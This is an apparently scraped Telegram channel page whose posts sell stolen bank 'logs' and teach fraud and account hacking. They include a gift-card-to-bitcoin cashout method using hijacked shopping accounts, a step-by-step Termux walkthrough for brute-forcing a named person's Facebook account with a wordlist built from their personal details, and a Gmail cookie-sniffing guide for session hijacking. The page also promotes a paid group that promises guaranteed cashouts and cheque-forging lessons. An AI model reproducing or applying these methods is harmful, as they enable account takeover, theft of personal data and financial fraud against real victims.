Get Mystery Box with random crypto!

CASH OUT TUTORIAL

Logo of telegram channel cash_out_tutorials — CASH OUT TUTORIAL C
Logo of telegram channel cash_out_tutorials — CASH OUT TUTORIAL
Channel address: @cash_out_tutorials
Categories: Uncategorized
Language: English
Subscribers: 408
Description from channel

LOADING
SPAMMING CLASSES AND TOOLS
CODING
HACKING COURSES AND TOOLS
ALL KINDS OF LOGS AVAILABLE
JUST dm me @dakwoods

Ratings & Reviews

2.67

3 reviews

Reviews can be left only by registered users. All reviews are moderated by admins.

5 stars

0

4 stars

0

3 stars

2

2 stars

1

1 stars

0


The latest Messages

2021-04-24 10:29:54
Payment on for jumai logs dm me to get yours
451 views07:29
Open / Comment
2021-04-24 10:07:20 Easiest way to make money with your phone

1•Shopwithscript:This method is one of the simplest way to make cool funds without any use of client all you need is a Paid vpn,a good device & common sense
Buy an old shopwithscript account with bank logs attached from your spammer or recommend you to go to any site to purchase tools,only old Shopwithscript accounts can work for this process,make sure it comes with email access,buy gift cards once you login,it depends on the balance you bought e.g you purchase an account with $2k balance,purchase gift cards of 1,900$ to avoid holding the account,these gift cards codes will be sent to the email or your email,they are called E-Codes,then you can trade them with your traders online or go to Paxful.com to purchase bitcoin with them after that
CELEBRATION TIME
No stress
2. LOGS CONVERSION TO BTC: All You need to here is just to purchase the exact balance of logs you want to convert to BTC then once your conversion is done I forward your BTC straight to your wallet

Example: You purchase $2K balance of logs for BTC conversion once I finish converting your logs for you... You don’t get the $2K balance of logs as BTC anymore (The maximum BTC you get once converted is $1.4K or $1.5K BTC For the $2K balance logs)

CASHOUT is 100% Guaranteed and Convertion is time is just 2HRS and 3 and half hours maximum for higher logs
@dakwoods
445 views07:07
Open / Comment
2021-04-24 10:02:59 HOW TO HACK A FACEBOOK ACCOUNT

Requirements:
- Termux
- 200 MB space
- Facebook target link
- Info about target
- Root

Setup:
$ apt install nodejs -y

$ pkg install git tsu -y

$ apt install python python2 -y

$ apt update; apt upgrade -y

$ npm install --global facebook-id-of

Getting ID

The first what we need is the ID of the facebook user, this can be found out through the facebook-id-of tool, which we have installed.

On the target profile, we can see URL like this:
https://www.facebook.com/michael.schmidt.7965692 — Remove the hyperlink and copy online name after facebook.com/.

$ facebook-id-of michael.schmidt.7965692

› Facebook ID of michael.schmidt.7965692 is 671393100

Dumping Information About Target

For this, we're gonna using the tool OSIF, it's still working and helping us, to get some details.

$ pkg update upgrade

$ pkg install git python2

$ git clone https://github.com/ciku370/OSIF

$ cd OSIF

$ pip2 install -r requirements.txt

For this tool you need a working, non 2FA facebook account, which can be used for scanning our target. (TARGET MUST EXIST IN FRIEND LIST)

$ python2 osif.py

D3b2y >> token
Type username (email) & Password.

D3b2y >> cat_token
[*]Your access token !!

Setup done now Hype

D3b2y >> dump_id
D3b3y >> dump_671393100

This fetching some informations about our target an example can be found here:

https://pastebin.com/10H7C22T

If you know your targets e-mail, it's much easier to attack them from the »bruteforce« tool.

D3b3y » dump_mail

Now on to creating a wordlist for bruteforcing

While people downloading random wordlists, creating wordlist with crunch and trying any other method with much effort, we can easily generate a wordlist related to information about our victim. This method has helped me several times to get into an Instagram account.

$ git clone https://github.com/Mebus/cupp.git; cd cupp/

$ python3 cupp.py -i

After tool has been started, fill out the information which you have dumped with OSIF.
It's asking :
> Do you want to add some key words about the victim? Y/[N]: y

> Please enter the words, separated by comma. [i.e. hacker,juice,black], spaces will be removed: football,blue,dog,maddisonschoolmarvelmovies,black,michaeljackson

> Do you want to add special chars at the end of words? Y/[N]: n

> Do you want to add some random numbers at the end of words? Y/[N]:y

> Leet mode? (i.e. leet = 1337) Y/[N]: y

$ cp -R test.txt $HOME

Choose same, if you need keyword put all keywords about target, if you target likes barcelona football club, type barcelona,football.
These keywords can be anything the victim likes. Mother's name, hobbies, favorite movies, food, color, sports, etc.

It's saved as name, as you used for the firstname. If you don't know partner, use any best friend information, there are few apps like tellonym.me, instagram.com, snapchat.com to fetch as much information as you need.

Bruteforcing the account

$ pkg install nano -y

$ git clone https://github.com/TunisianEagles/SocialBox.git; cd SocialBox; chmod +x *.sh

$ nano install-sb.sh

Edit all sudo lines, only remove sudo:
sudo apt-get update
After:
apt update

Exit — ctrl+x — y (yes) — enter.

$ ./install-sb.sh

$ cp -R $HOME/test.txt $PWD

$ ./SocialBox.sh

CP means we are copying our text file from cupp folder to home, then from home to the socialbox folder. Do it, you need in social a wordlist which has been created. If you don't want to copy it :

Choice > 1
Enter Facebook ID / Email / Username / Number: 671393100

Enter wordlist path : $HOME/cupp/test.txt

Now the Bruterforcer will start to read your password list, or the word list you specified, and then try to test the password in the background using YOUR IP address. I have also tried to crack a Facebook account a few times, please use a VPN!!

Be careful
405 views07:02
Open / Comment
2021-04-24 10:02:00
290 views07:02
Open / Comment
2021-04-23 10:49:22
288 views07:49
Open / Comment
2021-04-23 10:48:34 TPLEASE READ

Some people come to me with the following messages..

- I want to learn hustle
- I want to start from scratch
- I want you to help me
- I'm new to this
- What can i do to make money?

Please, know that i have over 7,500+ members on my channel, i get alot of views, and i get alot of chats daily... I can not be teaching everybody one-by-one. So i created a WhatsApp VIP group where i teach my students with alot of benefits on the group...

To be very honest with you, people who hustle for free tutorials always turn to be the poorest and most frustrated ones. They will say hustle no dey pay.

There's alot going on in my WhatsApp VIP group.

Only premium members can ask me any questions when having difficulties in anything.

Members get to share Ideas, tweaks, having lively chats.

Joining my VIP group earns you free working tools.

This membership is valid for life, cos it is a One time payment.

Don't wait for free things bruh, use your money to find more money.
----------------
Benefits of the WhatsApp VIP group

HOT AND FRESH UPDATES.
TUTORIALS FROM SCRATCH.
QUESTION AND ANSWERS.
FREE START UP TOOLS. (VPN, Dating sites, google voice, etc)
FULL ATTENTION.
EASY EXPLANATIONS.
GIVEAWAYS.
CHECK EDITING TUTORIAL.
ONE TIME FEE.
ENJOYABLE TALKS.
NO ONE WILL REMOVE YOU FROM THE GROUP.

PRICE IS N20,000

Cashout after joining is 100% sure. If you don't cashout in 7 days, you will get a refund of 15k and you will still remain in the group.

DM me now
Wa.me/23407040683358
299 views07:48
Open / Comment
2021-04-23 10:47:54 _*Gmail Hacking*_

- Understand the process
Whenever someone logs into Gmail (or any other login service), a file called a "cookie" is sent to their computer. This cookie allows the user to stay logged in, even if they leave Gmail. A packet sniffer can find cookies being transferred over a wireless network. When you find a Gmail cookie, you can open it on your computer and potentially access your target's inbox. You'll need to be connected to the same wireless network as your target

- Download and install Wireshark

Wireshark is a free network monitoring utility that you can download from wireshark.org. It is available for Windows, Mac, and Linux. Installing Wireshark is a straightforward process. Follow the prompts like you would with most programs

- Download Cookie Cadger

This is a Java program that will will find and intercept cookies being sent across the wireless network. Cookie Cadger doesn't need to be installed. It works the same in every operating system

-Connect to the same wireless network your target is connected to

You will need to be connected to the same wireless network as your target. This means you'll need to be close

- Launch Wireshark

Wireshark will need to be running in order for Cookie Cadger to work

-Run Cookie Cadger and select your wireless adapter

Select the adapter connected to the wireless network from the drop-down menu. You should see the main frame populate with unsecured cookies from other people using the network

- Use the domain filter to find Google cookies

The second column will display a list of domains that Cookie Cadger is finding cookies for. Look for Google domains, particularly mail.google.com

-Click "Replay This Request" when you've found a Gmail cookie

This will load the cookie into your own web browser. The right cookie will take you directly to the target's inbox.
Goodluck !
283 views07:47
Open / Comment
2021-04-23 10:46:10
SBA STILL hitting hot just dm to get started
236 views07:46
Open / Comment
2021-04-23 10:40:08
225 views07:40
Open / Comment
2021-04-21 11:04:50 https://chat.whatsapp.com/FzLvOqMpo9WACiaTzMDanZ
273 views08:04
Open / Comment